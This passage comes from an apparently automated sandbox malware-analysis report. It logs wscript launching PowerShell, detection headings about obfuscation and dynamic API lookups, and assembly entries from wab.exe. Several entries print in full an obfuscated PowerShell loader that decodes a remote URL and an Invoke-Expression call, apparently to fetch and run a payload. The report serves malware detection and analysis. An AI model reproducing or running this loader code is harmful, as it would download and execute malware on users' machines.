Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848FD5479 push ebp; iretd 2_2_00007FF848FD5538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07751FB2 push eax; mov dword ptr [esp], ecx 5_2_077521B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0775EC6C push FFFFFFE8h; retf 5_2_0775EC71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08573872 pushfd ; retf 5_2_08573881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0857386A pushad ; retf 5_2_08573871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0857369D push ebx; iretd 5_2_085736DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2806 push ecx; ret 8_2_240C2819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 13_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
